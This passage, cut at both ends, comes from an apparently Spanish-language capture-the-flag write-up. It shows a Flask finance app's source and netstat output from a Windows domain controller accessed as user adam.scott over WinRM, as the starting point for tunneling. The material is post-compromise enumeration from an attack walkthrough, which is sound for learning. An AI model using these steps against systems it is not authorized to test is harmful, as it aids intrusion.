class="n">remaining</span> <span class="o">=</span> <span class="n">monthly_salary</span> <span class="o">-</span> <span class="n">total_expenses</span> </span></span><span class="line"><span class="cl"> <span class="n">savings</span> <span class="o">=</span> <span class="n">allocation</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="n">allocation</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="n">investments</span> <span class="o">=</span> <span class="n">allocation</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="n">allocation</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;dashboard.html&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">monthly_salary</span><span class="o">=</span><span class="n">monthly_salary</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">yearly_salary</span><span class="o">=</span><span class="n">yearly_salary</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">expenses</span><span class="o">=</span><span class="n">expense_list</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">total_expenses</span><span class="o">=</span><span class="n">total_expenses</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">remaining</span><span class="o">=</span><span class="n">remaining</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">savings</span><span class="o">=</span><span class="n">savings</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">investments</span><span class="o">=</span><span class="n">investments</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/update_income&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="nd">@login_required</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">update_income</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">monthly_salary</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;monthly_salary&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">yearly_salary</span> <span class="o">=</span> <span class="n">monthly_salary</span> <span class="o">*</span> <span class="mi">12</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT id FROM incomes WHERE user_id = ?&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> </span></span><span class="line"><span class="cl"> <span class="n">existing</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">existing</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UPDATE incomes SET monthly_salary = ?, yearly_salary = ? WHERE user_id = ?&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">monthly_salary</span><span class="p">,</span> <span class="n">yearly_salary</span><span class="p">,</span> <span class="n">user_id</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;INSERT INTO incomes (user_id, monthly_salary, yearly_salary, created_at) VALUES (?, ?, ?, ?)&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">user_id</span><span class="p">,</span> <span class="n">monthly_salary</span><span class="p">,</span> <span class="n">yearly_salary</span><span class="p">,</span> <span class="n">datetime</span><span class="o">.</span><span class="n">now</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">commit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Income updated successfully!&#39;</span><span class="p">,</span> <span class="s1">&#39;success&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;dashboard&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/add_expense&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="nd">@login_required</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">add_expense</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">category</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;category&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">exp_type</span> <span class="o">=</span> <span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;type&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">value</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;value&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;INSERT INTO expenses (user_id, category, type, value, created_at) VALUES (?, ?, ?, ?, ?)&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">user_id</span><span class="p">,</span> <span class="n">category</span><span class="p">,</span> <span class="n">exp_type</span><span class="p">,</span> <span class="n">value</span><span class="p">,</span> <span class="n">datetime</span><span class="o">.</span><span class="n">now</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">commit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Expense added successfully!&#39;</span><span class="p">,</span> <span class="s1">&#39;success&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;dashboard&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/delete_expense/&lt;int:expense_id&gt;&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="nd">@login_required</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">delete_expense</span><span class="p">(</span><span class="n">expense_id</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;DELETE FROM expenses WHERE id = ? AND user_id = ?&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">expense_id</span><span class="p">,</span> <span class="n">user_id</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">commit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Expense deleted successfully!&#39;</span><span class="p">,</span> <span class="s1">&#39;success&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;dashboard&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/update_allocation&#39;</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s1">&#39;POST&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"><span class="nd">@login_required</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">update_allocation</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">user_id</span> <span class="o">=</span> <span class="n">session</span><span class="p">[</span><span class="s1">&#39;user_id&#39;</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">savings</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;savings&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="n">investments</span> <span class="o">=</span> <span class="nb">float</span><span class="p">(</span><span class="n">request</span><span class="o">.</span><span class="n">form</span><span class="p">[</span><span class="s1">&#39;investments&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT id FROM allocations WHERE user_id = ?&#34;</span><span class="p">,</span> <span class="p">(</span><span class="n">user_id</span><span class="p">,))</span> </span></span><span class="line"><span class="cl"> <span class="n">existing</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">existing</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;UPDATE allocations SET savings = ?, investments = ? WHERE user_id = ?&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">savings</span><span class="p">,</span> <span class="n">investments</span><span class="p">,</span> <span class="n">user_id</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span> </span></span><span class="line"><span class="cl"> <span class="s2">&#34;INSERT INTO allocations (user_id, savings, investments, created_at) VALUES (?, ?, ?, ?)&#34;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="p">(</span><span class="n">user_id</span><span class="p">,</span> <span class="n">savings</span><span class="p">,</span> <span class="n">investments</span><span class="p">,</span> <span class="n">datetime</span><span class="o">.</span><span class="n">now</span><span class="p">())</span> </span></span><span class="line"><span class="cl"> <span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">commit</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">flash</span><span class="p">(</span><span class="s1">&#39;Allocation updated successfully!&#39;</span><span class="p">,</span> <span class="s1">&#39;success&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="n">url_for</span><span class="p">(</span><span class="s1">&#39;dashboard&#39;</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/admin&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="nd">@admin_required</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">admin</span><span class="p">():</span> </span></span><span class="line"><span class="cl"> <span class="n">track_visit</span><span class="p">(</span><span class="s1">&#39;/admin&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span> <span class="o">=</span> <span class="n">get_db_connection</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">cursor</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT COUNT(*) FROM users&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">total_users</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT COUNT(*) FROM visits&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">total_visits</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT COUNT(*) FROM expenses&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">total_expenses_count</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()[</span><span class="mi">0</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> <span class="n">avg_expenses</span> <span class="o">=</span> <span class="n">total_expenses_count</span> <span class="o">/</span> <span class="n">total_users</span> <span class="k">if</span> <span class="n">total_users</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT AVG(savings), AVG(investments) FROM allocations&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">allocation_avg</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchone</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">avg_savings</span> <span class="o">=</span> <span class="n">allocation_avg</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">if</span> <span class="n">allocation_avg</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> <span class="n">avg_investments</span> <span class="o">=</span> <span class="n">allocation_avg</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="n">allocation_avg</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">else</span> <span class="mi">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT category, COUNT(*) as count FROM expenses GROUP BY category ORDER BY count DESC&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">top_categories</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchall</span><span class="p">()[:</span><span class="mi">5</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">cursor</span><span class="o">.</span><span class="n">execute</span><span class="p">(</span><span class="s2">&#34;SELECT full_name, username, email, created_at FROM users ORDER BY created_at DESC&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">recent_users</span> <span class="o">=</span> <span class="n">cursor</span><span class="o">.</span><span class="n">fetchall</span><span class="p">()[:</span><span class="mi">5</span><span class="p">]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">conn</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s1">&#39;admin.html&#39;</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">total_users</span><span class="o">=</span><span class="n">total_users</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">total_visits</span><span class="o">=</span><span class="n">total_visits</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">avg_expenses</span><span class="o">=</span><span class="n">avg_expenses</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">avg_savings</span><span class="o">=</span><span class="n">avg_savings</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">avg_investments</span><span class="o">=</span><span class="n">avg_investments</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">top_categories</span><span class="o">=</span><span class="n">top_categories</span><span class="p">,</span> </span></span><span class="line"><span class="cl"> <span class="n">recent_users</span><span class="o">=</span><span class="n">recent_users</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">app</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s1">&#39;0.0.0.0&#39;</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="mi">80</span><span class="p">)</span> </span></span></code></pre></td></tr></table> </div> </div> </div> </div></p> <h2 id="tunneling">Tunneling</h2> <p>Localmente observamos que exiten otros puertos abiertos.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">PS C:<span class="se">\U</span>sers<span class="se">\a</span>dam.scott<span class="se">\D</span>ocuments&gt; netstat -ano <span class="p">|</span> findstr /v UDP </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Active Connections </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Proto Local Address Foreign Address State PID </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:80 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:88 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:135 0.0.0.0:0 LISTENING <span class="m">396</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:389 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:445 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:464 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:593 0.0.0.0:0 LISTENING <span class="m">396</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:636 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING <span class="m">2684</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING <span class="m">2560</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING <span class="m">672</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING <span class="m">1160</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING <span class="m">1440</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49680 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49681 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49684 0.0.0.0:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49689 0.0.0.0:0 LISTENING <span class="m">808</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:49703 0.0.0.0:0 LISTENING <span class="m">2656</span> </span></span><span class="line"><span class="cl"> TCP 0.0.0.0:57599 0.0.0.0:0 LISTENING <span class="m">2636</span> </span></span><span class="line"><span class="cl"> TCP 10.129.78.214:53 0.0.0.0:0 LISTENING <span class="m">2656</span> </span></span><span class="line"><span class="cl"> TCP 10.129.78.214:139 0.0.0.0:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 10.129.78.214:5985 10.10.14.6:57228 ESTABLISHED <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP 127.0.0.1:53 0.0.0.0:0 LISTENING <span class="m">2656</span> </span></span><span class="line"><span class="cl"> TCP 127.0.0.1:1434 0.0.0.0:0 LISTENING <span class="m">2684</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:80 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:88 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:135 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">396</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:389 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:445 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:464 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:593 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">396</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:636 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:1433 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2684</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:3268 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:3269 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:5985 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:9389 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">2560</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:47001 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">4</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49664 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49665 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">672</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49666 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1160</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49667 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">1440</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49668 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49680 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span class="line"><span class="cl"> TCP <span class="o">[</span>::<span class="o">]</span>:49681 <span class="o">[</span>::<span class="o">]</span>:0 LISTENING <span class="m">820</span> </span></span><span 